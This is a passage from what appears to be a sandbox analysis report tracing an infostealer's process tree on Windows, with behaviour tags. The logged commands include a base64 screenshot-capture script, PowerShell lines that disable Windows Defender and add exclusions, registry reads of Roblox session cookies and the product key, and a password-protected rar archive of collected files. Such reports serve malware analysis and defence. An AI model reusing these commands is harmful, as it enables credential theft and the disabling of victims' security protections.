AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5684
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\miazkuwz\miazkuwz.cmdline"
        6⤵
        
        PID:5536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CC8.tmp" "c:\Users\Admin\AppData\Local\Temp\miazkuwz\CSC9C3526595C7C4F93A8AF5FB51D87B168.TMP"
        7⤵
        
        PID:5672
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5776
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5872
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6080
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:5196
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5268
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5576
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3012
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5656
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1888"
      4⤵
      PID:5776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1888
        5⤵
        Kills process with taskkill
        
        PID:5872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3392"
      4⤵
      PID:2308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3392
        5⤵
        Kills process with taskkill
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2068"
      4⤵
      PID:5624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2068
        5⤵
        Kills process with taskkill
        
        PID:5984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4412"
      4⤵
      PID:5304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4412
        5⤵
        Kills process with taskkill
        
        PID:5472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1812"
      4⤵
      PID:5696
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1812
        5⤵
        Kills process with taskkill
        
        PID:5728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1888"
      4⤵
      PID:5772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1888
        5⤵
        Kills process with taskkill
        
        PID:5376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1976"
      4⤵
      PID:5496
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1976
        5⤵
        Kills process with taskkill
        
        PID:5792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3392"
      4⤵
      PID:5988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3392
        5⤵
        Kills process with taskkill
        
        PID:5284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1092"
      4⤵
      PID:6020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1092
        5⤵
        Kills process with taskkill
        
        PID:5128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2068"
      4⤵
      PID:5836
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2068
        5⤵
        Kills process with taskkill
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4524"
      4⤵
      PID:4972
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4524
        5⤵
        Kills process with taskkill
        
        PID:5800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4412"
      4⤵
      PID:5168
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4412
        5⤵
        Kills process with taskkill
        
        PID:5996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2852"
      4⤵
      PID:492
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2852
        5⤵
        Kills process with taskkill
        
        PID:6116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1812"
      4⤵
      PID:2464
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1812
        5⤵
        Kills process with taskkill
        
        PID:5356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1976"
      4⤵
      PID:2104
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1976
        5⤵
        Kills process with taskkill
        
        PID:5268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1092"
      4⤵
      PID:5216
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1092
        5⤵
        Kills process with taskkill
        
        PID:5844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4524"
      4⤵
      PID:5740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4524
        5⤵
        Kills process with taskkill
        
        PID:5440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2852"
      4⤵
      PID:5676
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2852
        5⤵
        Kills process with taskkill
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5804
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aRiMt.zip" *"
      4⤵
      PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\_MEI46042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI46042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aRiMt.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6016
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:2444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6132
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4304
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5080

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3008

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update-internal
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2244
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x10dc694,0x10dc6a0,0x10dc6ac
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:4772

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:340
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x10dc694,0x10dc6a0,0x10dc6ac
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2776
- C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\127.0.6533.89_chrome_installer.exe
  "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\127.0.6533.89_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\b0331570-6a14-40bf-ab70-c8f0a217694c.tmp"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5556
- - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe
    "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe" --install-archive="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\b0331570-6a14-40bf-ab70-c8f0a217694c.tmp"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - System Network Configuration Discovery: Internet Connection Discovery
    - Modifies registry class
    PID:5312
  - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe
      C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=127.0.6533.89 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff6f68e41f8,0x7ff6f68e4204,0x7ff6f68e4210
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:5780
  - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe
      "C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:5832
    - - C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe
        
        C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=127.0.6533.89 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff6f68e41f8,0x7ff6f68e4204,0x7ff6f68e4210
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:5492

C:\Program Files\Google\Chrome\Application\127.0.6533.89\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\127.0.6533.89\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:2224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6000

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1308

C:\Users\Admin\Downloads\Resource.exe
"C:\Users\Admin\Downloads\Resource.exe"
1⤵
- Executes dropped EXE
PID:3952
- C:\Users\Admin\Downloads\Resource.exe
  "C:\Users\Admin\Downloads\Resource.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Resource.exe'"
    3⤵
    PID:5676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Resource.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:900
    - - C:\Windows\SystemTemp\Google900_1306804875\bin\updater.exe
        
        "C:\Windows\SystemTemp\Google900_1306804875\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={315C8B51-E03C-0233-04D0-9C97DD8F9176}&lang=de&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2
        5⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:6108
      - C:\Windows\SystemTemp\Google900_1306804875\bin\updater.exe
        
        C:\Windows\SystemTemp\Google900_1306804875\bin\updater.exe --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x69c694,0x69c6a0,0x69c6ac
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4588
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer
        6⤵
        Loads dropped DLL
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of SendNotifyMessage
        
        PID:5308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=127.0.6533.89 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd740fe790,0x7ffd740fe79c,0x7ffd740fe7a8
        7⤵
        Loads dropped DLL
        
        PID:6012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2452,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2448 /prefetch:2
        7⤵
        Loads dropped DLL
        
        PID:1316
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1832,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2484 /prefetch:11
        7⤵
        Loads dropped DLL
        
        PID:5880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2004,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2588 /prefetch:13
        7⤵
        
        PID:5872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3200 /prefetch:1
        7⤵
        
        PID:2964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3224 /prefetch:1
        7⤵
        
        PID:5996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4320 /prefetch:1
        7⤵
        
        PID:4460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3892,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4748 /prefetch:1
        7⤵
        
        PID:5688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4940,i,12863347671480232679,18167355290253045707,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4960 /prefetch:14
        7⤵
        
        PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3484
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
